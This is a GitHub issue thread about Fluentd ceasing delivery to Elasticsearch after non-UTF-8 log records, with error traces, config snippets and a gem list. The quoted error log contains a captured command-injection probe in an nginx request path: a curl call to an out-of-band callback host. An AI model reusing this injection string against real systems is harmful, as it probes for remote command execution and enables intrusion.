
Fluentd stops shipping logs to Elasticsearch after hitting a non-UTF-8 character in a log #1018

danfinn opened this issue Jun 2, 2023 · 2 comments

danfinn commented Jun 2, 2023

(check apply)

  • [x] read the contribution guideline
  • [x] (optional) already reported 3rd party upstream repository or mailing list if you use k8s addon or helm charts.

Problem

We've been facing some major issues in production lately that we have tracked down to several types of logs being collected with non-UTF-8 encoded characters. Once fluentd hits one of these logs, all logs stop getting delivered to Elasticsearch. Here is the error from one of the logs:

2023-06-02 15:35:26 +0000 [trace]: #0 [out_es] chunk taken back instance=51660 chunk_id="5fd268b35b2a9112985c10fd584d2aed" metadata=#<struct Fluent::Plugin::Buffer::Metadata timekey=nil, tag="kubernetes.var.log.containers.nginx-ingress-ingress-nginx-controller-757ddbc8fd-x8nmx_gateway_controller-da786ea0839b545cfcfc75a8ff585dfecd7af1525299d41719902d558b9e6177.log", variables=nil, seq=0>
2023-06-02 15:35:26 +0000 [warn]: #0 [out_es] failed to flush the buffer. retry_times=101 next_retry_time=2023-06-02 15:35:57 +0000 chunk="5fd268b35b2a9112985c10fd584d2aed" error_class=Fluent::Plugin::ElasticsearchOutput::RecoverableRequestFailure error="could not push logs to Elasticsearch cluster ({:host=>\"elastic.domain.com\", :port=>9200, :scheme=>\"https\", :user=>\"prod-fluentd-daemonset\", :password=>\"obfuscated\", :path=>\"\"}): [400] {\"error\":{\"root_cause\":[{\"type\":\"parse_exception\",\"reason\":\"Failed to parse content to map\"}],\"type\":\"parse_exception\",\"reason\":\"Failed to parse content to map\",\"caused_by\":{\"type\":\"json_parse_exception\",\"reason\":\"Invalid UTF-8 middle byte 0x7f\\n at [Source: (byte[])\\\"{\\\"@timestamp\\\":\\\"2023-06-02T14:42:16+00:00\\\",\\\"remote_addr\\\":\\\"89.116.25.154\\\",\\\"x-forward-for\\\":\\\"89.116.25.154\\\",\\\"request_id\\\":\\\"c27eea84167b098addcc3ccc4a575a0d\\\",\\\"remote_user\\\":\\\"\\\",\\\"bytes_sent\\\":1083,\\\"request_time\\\":0.003,\\\"status\\\":403,\\\"vhost\\\":\\\"collaboration.domain.com\\\",\\\"request_proto\\\":\\\"HTTP/1.1\\\",\\\"path\\\":\\\"/\\\\u0004\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFDd\uFFFD\\\\u0006\\\\b;{curl,http:/chqgu8aaibnbbla4dcggfwb61io33zwdm.oast.pro+-H+'User-Agent:+lMKrrg'};\\\\u0004\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFDd\uFFFD\\\\u0006\\\\b;{curl,http:/chqgu8aaibnbbla4dcgg\\\"[truncated 2173 bytes]; line: 1, column: 321]\"}},\"status\":400}"
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:1148:in `rescue in send_bulk'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:1110:in `send_bulk'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:886:in `block in write'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:885:in `each'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:885:in `write'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin/output.rb:1225:in `try_flush'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin/output.rb:1538:in `flush_thread_run'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin/output.rb:510:in `block (2 levels) in start'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin_helper/thread.rb:78:in `block in thread_create'

Fluentd then goes into a loop, retrying delivery of this chunk forever. We probably have an upstream problem with these logs that we don't yet know how to fix (open to suggestions), but the issue we are seeing with fluentd is that all logs stop shipping to Elasticsearch once it enters this state. We can see buffer chunks accumulating on the fluentd pod, but they are never delivered.

Here is our config:

    <match **>
      @type elasticsearch
      @id out_es
      @log_level "#{ENV['FLUENT_LOG_LEVEL'] || 'TRACE'}"
      include_tag_key true
      suppress_type_name true
      hosts "#{ENV['FLUENT_ELASTICSEARCH_HOSTS'] || 'elasticsearch:9200'}"
      path "#{ENV['FLUENT_ELASTICSEARCH_PATH']}"
      scheme "#{ENV['FLUENT_ELASTICSEARCH_SCHEME'] || 'http'}"
      ssl_verify "#{ENV['FLUENT_ELASTICSEARCH_SSL_VERIFY'] || 'true'}"
      ssl_version "#{ENV['FLUENT_ELASTICSEARCH_SSL_VERSION'] || 'TLSv1_2'}"
      default_elasticsearch_version "#{ENV['FLUENT_ELASTICSEARCH_VRSN'] || '7'}"
      user "#{ENV['FLUENT_ELASTICSEARCH_USER'] || use_default}"
      password "#{ENV['FLUENT_ELASTICSEARCH_PASSWORD'] || use_default}"
      reload_connections "#{ENV['FLUENT_ELASTICSEARCH_RELOAD_CONNECTIONS'] || 'false'}"
      reconnect_on_error "#{ENV['FLUENT_ELASTICSEARCH_RECONNECT_ON_ERROR'] || 'true'}"
      reload_on_failure "#{ENV['FLUENT_ELASTICSEARCH_RELOAD_ON_FAILURE'] || 'true'}"
      log_es_400_reason "#{ENV['FLUENT_ELASTICSEARCH_LOG_ES_400_REASON'] || 'false'}"
      logstash_prefix "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_PREFIX'] || 'logstash'}"
      logstash_dateformat "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_DATEFORMAT'] || '%Y.%m.%d'}"
      logstash_format "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_FORMAT'] || 'true'}"
      index_name "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_INDEX_NAME'] || 'logstash'}"
      target_index_key "#{ENV['FLUENT_ELASTICSEARCH_TARGET_INDEX_KEY'] || use_nil}"
      type_name "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_TYPE_NAME'] || 'fluentd'}"
      include_timestamp "#{ENV['FLUENT_ELASTICSEARCH_INCLUDE_TIMESTAMP'] || 'false'}"
      template_name "#{ENV['FLUENT_ELASTICSEARCH_TEMPLATE_NAME'] || use_nil}"
      template_file "#{ENV['FLUENT_ELASTICSEARCH_TEMPLATE_FILE'] || use_nil}"
      template_overwrite "#{ENV['FLUENT_ELASTICSEARCH_TEMPLATE_OVERWRITE'] || use_default}"
      request_timeout "#{ENV['FLUENT_ELASTICSEARCH_REQUEST_TIMEOUT'] || '120s'}"
      application_name "#{ENV['FLUENT_ELASTICSEARCH_APPLICATION_NAME'] || use_default}"
      enable_ilm "#{ENV['FLUENT_ELASTICSEARCH_ENABLE_ILM'] || 'false'}"
      customize_template "#{ENV['FLUENT_ELASTICSEARCH_CUSTOMIZE_TEMPLATE'] || use_default}"
      rollover_index "#{ENV['FLUENT_ELASTICSEARCH_ROLLOVER_INDEX'] || 'false'}"
      index_date_pattern "#{ENV['FLUENT_ELASTICSEARCH_ROLLOVER_INDEX'] || 'now/d'}"
      ilm_policy_id "#{ENV['FLUENT_ELASTICSEARCH_ILM_POLICY_ID'] || use_default}"
      ilm_policy "#{ENV['FLUENT_ELASTICSEARCH_ILM_POLICY'] || use_default}"
      ilm_policy_overwrite "#{ENV['FLUENT_ELASTICSEARCH_ILM_POLICY_OVERWRITE'] || 'false'}"
      pipeline fluentd_logs
      <buffer>
        @type file
        path /fluentd/log/elastic-buffer
        flush_thread_count 8
        flush_interval 15s
        chunk_limit_size 32MB
        queue_limit_length 4
        flush_mode interval
        retry_max_interval 30
        retry_forever true
      </buffer>
    </match>
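
Part of the stall is likely self-inflicted by retry_forever true above: a chunk that Elasticsearch rejects with a 400 is retried indefinitely, and with queue_limit_length 4 the queue fills up behind it. A minimal sketch of a bounded-retry buffer with a local fallback (untested; retry_max_times and <secondary> are standard Fluentd buffer/output features, and the fallback directory path is hypothetical):

    <buffer>
      @type file
      path /fluentd/log/elastic-buffer
      flush_thread_count 8
      flush_interval 15s
      flush_mode interval
      chunk_limit_size 32MB
      queue_limit_length 4
      retry_max_interval 30
      # Give up on a chunk after a bounded number of retries instead of
      # retrying forever; exhausted chunks are routed to <secondary>.
      retry_forever false
      retry_max_times 10
    </buffer>
    <secondary>
      # Dump undeliverable chunks to local files for inspection
      # instead of blocking the pipeline (hypothetical path).
      @type secondary_file
      directory /fluentd/log/failed
    </secondary>

The trade-off is that an exhausted chunk leaves the main flow entirely, so every record in that chunk ends up in the fallback files, not just the malformed one.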

Is there a way to force UTF-8 encoding in this plugin?
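
While we wait for an answer, we are experimenting with scrubbing invalid bytes upstream of the output. A rough sketch using record_transformer with enable_ruby (untested; it assumes the offending bytes arrive in the nginx path field, and relies on Ruby's String#scrub, which replaces invalid byte sequences with a placeholder):

    <filter kubernetes.var.log.containers.nginx-ingress-**>
      @type record_transformer
      enable_ruby true
      <record>
        # Re-tag the bytes as UTF-8, then replace any invalid
        # sequences with "?" (String#scrub, Ruby >= 2.1).
        path ${record["path"].to_s.force_encoding("UTF-8").scrub("?")}
      </record>
    </filter>

This only covers a single known-bad field; scrubbing every string field in a record would need a custom filter or similar.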

Because of this we have ended up in a very unstable state with fluentd and are constantly seeing issues with it in our production environment. Any help would be much appreciated.

Steps to replicate

Either clone and modify https://gist.github.com/pitr/9a518e840db58f435911

OR

Provide example config and message

Expected Behavior or What you need to ask

fluentd should continue to process logs after a record is rejected
...

Using Fluentd and ES plugin versions

FROM fluent/fluentd:v1.15-debian-1
k8s

fluent-gem list

*** LOCAL GEMS ***

abbrev (default: 0.1.0)
addressable (2.8.4)
async (1.30.3)
async-http (0.56.6)
async-io (1.34.3)
async-pool (0.3.12)
azure-storage-blob (2.0.3)
azure-storage-common (2.0.4)
base64 (default: 0.1.1)
benchmark (default: 0.2.0)
bigdecimal (default: 3.1.1)
bundler (default: 2.3.26)
cgi (default: 0.3.5)
concurrent-ruby (1.2.2, 1.2.0)
connection_pool (2.4.0)
console (1.16.2)
cool.io (1.7.1)
csv (default: 3.2.5)
date (default: 3.2.2)
debug (1.6.3)
delegate (default: 0.2.0)
did_you_mean (default: 1.6.1)
digest (default: 3.1.0)
domain_name (0.5.20190701)
drb (default: 2.1.0)
elastic-transport (8.2.1)
elasticsearch (8.6.0)
elasticsearch-api (8.6.0)
english (default: 0.7.1)
erb (default: 2.2.3)
error_highlight (default: 0.3.0)
etc (default: 1.3.0)
excon (0.99.0)
faraday (2.7.4, 1.10.0)
faraday-em_http (1.0.0)
faraday-em_synchrony (1.0.0)
faraday-excon (2.1.0, 1.1.0)
faraday-httpclient (1.0.1)
faraday-multipart (1.0.4)
faraday-net_http (3.0.2, 1.0.1)
faraday-net_http_persistent (1.2.0)
faraday-patron (1.0.0)
faraday-rack (1.0.0)
faraday-retry (1.0.3)
faraday_middleware (1.2.0)
fcntl (default: 1.0.1)
ffi (1.15.5)
ffi-compiler (1.0.1)
fiber-local (1.0.0)
fiddle (default: 1.1.0)
fileutils (default: 1.6.0)
find (default: 0.1.1)
fluent-config-regexp-type (1.0.0)
fluent-plugin-azure-storage-append-blob (0.2.1)
fluent-plugin-concat (2.5.0)
fluent-plugin-dedot_filter (1.0.0)
fluent-plugin-detect-exceptions (0.0.15)
fluent-plugin-elasticsearch (5.3.0)
fluent-plugin-grok-parser (2.6.2)
fluent-plugin-json-in-json-2 (1.0.2)
fluent-plugin-kubernetes_metadata_filter (3.2.0)
fluent-plugin-multi-format-parser (1.0.0)
fluent-plugin-parser-cri (0.1.1)
fluent-plugin-prometheus (2.0.3)
fluent-plugin-record-modifier (2.1.1)
fluent-plugin-rewrite-tag-filter (2.4.0)
fluent-plugin-systemd (1.0.5)
fluentd (1.16.1, 1.15.3)
forwardable (default: 1.3.2)
getoptlong (default: 0.1.1)
http (5.1.1)
http-accept (1.7.0)
http-cookie (1.0.5)
http-form_data (2.3.0)
http_parser.rb (0.8.0)
io-console (default: 0.5.11)
io-nonblock (default: 0.1.0)
io-wait (default: 0.2.1)
ipaddr (default: 1.2.4)
irb (default: 1.4.1)
json (2.6.3, default: 2.6.1)
jsonpath (1.1.3)
kubeclient (4.11.0)
llhttp-ffi (0.4.0)
logger (default: 1.5.0)
lru_redux (1.1.0)
matrix (0.4.2)
mime-types (3.4.1)
mime-types-data (3.2023.0218.1)
minitest (5.15.0)
msgpack (1.7.0, 1.6.0)
multi_json (1.15.0)
multipart-post (2.3.0)
mutex_m (default: 0.1.1)
net-ftp (0.1.3)
net-http (default: 0.3.0)
net-http-persistent (4.0.2)
net-imap (0.2.3)
net-pop (0.1.1)
net-protocol (default: 0.1.2)
net-smtp (0.3.1)
netrc (0.11.0)
nio4r (2.5.8)
nkf (default: 0.1.1)
nokogiri (1.15.0 x86_64-linux)
observer (default: 0.1.1)
oj (3.14.2)
open-uri (default: 0.2.0)
open3 (default: 0.1.1)
openssl (default: 3.0.1)
optparse (default: 0.2.0)
ostruct (default: 0.5.2)
pathname (default: 0.2.0)
power_assert (2.0.1)
pp (default: 0.3.0)
prettyprint (default: 0.1.1)
prime (0.1.2)
prometheus-client (4.1.0)
protocol-hpack (1.4.2)
protocol-http (0.22.9)
protocol-http1 (0.14.6)
protocol-http2 (0.14.2)
pstore (default: 0.1.1)
psych (default: 4.0.4)
public_suffix (5.0.1)
racc (default: 1.6.0)
rake (13.0.6)
rbs (2.7.0)
rdoc (default: 6.4.0)
readline (default: 0.0.3)
readline-ext (default: 0.1.4)
recursive-open-struct (1.1.3)
reline (default: 0.3.1)
resolv (default: 0.2.1)
resolv-replace (default: 0.1.0)
rest-client (2.1.0)
rexml (3.2.5)
rinda (default: 0.1.1)
rss (0.2.9)
ruby2_keywords (default: 0.0.5)
securerandom (default: 0.2.0)
serverengine (2.3.2, 2.3.1)
set (default: 1.0.2)
shellwords (default: 0.1.0)
sigdump (0.2.4)
singleton (default: 0.1.1)
stringio (default: 3.0.1)
strptime (0.2.5)
strscan (default: 3.0.1)
syslog (default: 0.1.0)
systemd-journal (1.4.2)
tempfile (default: 0.1.2)
test-unit (3.5.3)
time (default: 0.2.0)
timeout (default: 0.2.0)
timers (4.3.5)
tmpdir (default: 0.1.2)
traces (0.4.1)
tsort (default: 0.1.0)
typeprof (0.21.3)
tzinfo (2.0.6)
tzinfo-data (1.2023.3, 1.2022.7)
un (default: 0.2.0)
unf (0.1.4)
unf_ext (0.0.8.2)
uri (default: 0.11.0)
weakref (default: 0.1.1)
webrick (1.8.1, 1.7.0)
yajl-ruby (1.4.3)
yaml (default: 0.2.0)
zlib (default: 2.1.1)

Elasticsearch 8.7.0

danfinn (author) commented Jun 2, 2023

We did try adding:

    <filter **>
      @type record_modifier
      char_encoding ISO-8859-1:utf-8
      char_encoding utf-8
    </filter>

to our config, but that does not seem to have made any difference; we are still seeing the same issue.
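
One possible wrinkle with the attempt above: char_encoding appears to be a scalar parameter, so listing it twice presumably means only the last line takes effect, and char_encoding utf-8 merely relabels the bytes as UTF-8 without converting anything. If that is right, the conversion form on its own might behave differently (a sketch, untested):

    <filter **>
      @type record_modifier
      # Single directive: actually transcode from ISO-8859-1 (in which
      # every byte sequence is valid) to UTF-8, rather than only
      # relabeling the bytes; the output is then always valid UTF-8.
      char_encoding ISO-8859-1:utf-8
    </filter>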

rmawhinnie commented

watching
